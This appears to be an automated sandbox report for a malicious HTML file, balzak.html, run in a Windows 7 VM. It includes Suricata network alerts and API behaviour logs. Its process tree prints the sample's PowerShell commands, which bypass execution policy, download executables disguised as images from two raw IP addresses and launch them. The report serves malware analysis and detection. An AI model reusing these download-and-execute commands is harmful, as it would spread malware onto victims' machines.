Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Nov. 18, 2021, 1:44 p.m.	Nov. 18, 2021, 1:46 p.m.

Size	12.1KB
Type	data
MD5	`c8975f3bb4a94c035e7b3a4594c8dab0`
SHA256	`3e8029f38e9fd7877e994370dc430b754cea9191ec013eadf9051ab6fb999c37`
CRC32	`896B6104`
ssdeep	`384:SBY5oPB4B85OsvXaH6sAqP/7vYwmfIWlKTdck:SAoPqB8ABPTvYw5WlcdX`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\balzak.html
1408
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1408 CREDAT:145409
  2252
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://94.140.115.0/images/bird.png','C:\ProgramData\Google.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google.jpeg'
    2508
    - cmd.exe "C:\Windows\system32\cmd.exe" /c start C:\ProgramData\Google.jpeg
      2248
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bypass -nop (New-Object System.Net.WebClient).DownloadFile('http://198.252.108.121/images/bird.png','C:\ProgramData\Google1.jpeg');Sleep -s 5;cmd /c start 'C:\ProgramData\Google1.jpeg'
    1660
    - cmd.exe "C:\Windows\system32\cmd.exe" /c start C:\ProgramData\Google1.jpeg
      560

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
198.252.108.121	Active	Moloch
94.140.115.0	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 94.140.115.0:80 -> 192.168.56.102:49170	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 94.140.115.0:80 -> 192.168.56.102:49170	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 94.140.115.0:80 -> 192.168.56.102:49170	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 198.252.108.121:80 -> 192.168.56.102:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 198.252.108.121:80 -> 192.168.56.102:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 198.252.108.121:80 -> 192.168.56.102:49171	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 18, 2021, 1:45 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 18, 2021, 1:45 p.m.			0	0
IsDebuggerPresent Nov. 18, 2021, 1:45 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000045a6a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000469230 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000469230 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000469230 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3ae0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3ae0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3f40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3bc0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e3e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e43a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e43a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e43a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4560 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4560 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e45d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e45d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4560 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4560 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4560 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4720 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4720 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4790 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9e4790 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ba02340 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ba02340 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000475900 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5b8000 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5b8000 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5b8000 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5d9930 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5d9930 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5d9a10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5d9a10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5d9a10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Nov. 18, 2021, 1:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b5d9a10 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 18, 2021, 1:45 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://94.140.115.0/images/bird.png
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://198.252.108.121/images/bird.png

Performs some HTTP requests (2 events)

request	GET http://94.140.115.0/images/bird.png
request	GET http://198.252.108.121/images/bird.png

Allocates read-write-execute memory (usually to unpack itself) (50 out of 495 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 region_size: 1511424 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000025d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007756d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077574000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc5c5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc5c5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe0c4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff4a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007755a000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa7c7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef7019000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002740000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007756d000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077574000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefc5c5000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe0c4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007feff4a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007755a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 1408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 region_size: 2953216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002790000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000775c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 18, 2021, 1:37 p.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007756d000 process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

